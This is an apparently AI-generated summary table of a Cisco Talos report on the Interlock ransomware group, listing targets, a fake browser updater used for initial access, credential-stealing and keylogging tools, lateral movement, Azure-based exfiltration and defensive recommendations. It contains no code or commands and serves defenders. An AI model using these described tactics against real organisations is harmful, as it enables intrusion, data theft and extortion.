| Category | Details |
|---|---|
| Threat Actors | Interlock Ransomware Group, possibly emerged from Rhysida Ransomware operators |
| Campaign Overview | Big-game hunting and double extortion attacks using Interlock ransomware; attacker utilized multiple tools and techniques to gain access and exfiltrate data before deploying ransomware |
| Target Regions (Victims) | Healthcare, technology, government (U.S.), manufacturing (Europe) |
| Methodology | Delivered via fake browser updater (RAT); used RDP, AnyDesk, PuTTY for lateral movement; used Azure Storage Explorer and AzCopy for data exfiltration |
| Product Targeted | Windows and Linux machines, specifically targeting sensitive data and files |
| Malware Reference | Interlock ransomware (Windows EXE and Linux ELF variants) |
| Tools Used | Fake browser updater (RAT), PowerShell scripts, credential stealer (cht.exe), keylogger (klg.dll), Remote Desktop Protocol (RDP), AnyDesk, PuTTY, Azure Storage Explorer, AzCopy |
| Vulnerabilities Exploited | Exploited unaddressed vulnerabilities in infrastructure; fake browser update and compromised legitimate URLs |
| TTPs (Tactics, Techniques, Procedures) | Initial access via fake browser updater, keylogging, credential stealing, lateral movement using RDP/AnyDesk/PuTTY, data exfiltration using Azure Storage Explorer, deployment of ransomware encryptor; file encryption with specific exclusions |
| Attribution | Likely from Rhysida ransomware operators or developers based on similarities in tactics and ransomware encryptor |
| Recommendations | Organizations should address vulnerabilities in infrastructure, use multi-factor authentication, monitor RDP usage, and secure data exfiltration points |
| Source | Cisco Talos Blog |
Read full article: https://blog.talosintelligence.com/emerging-interlock-ransomware/
The above summary has been generated by an AI language model
Leave a Reply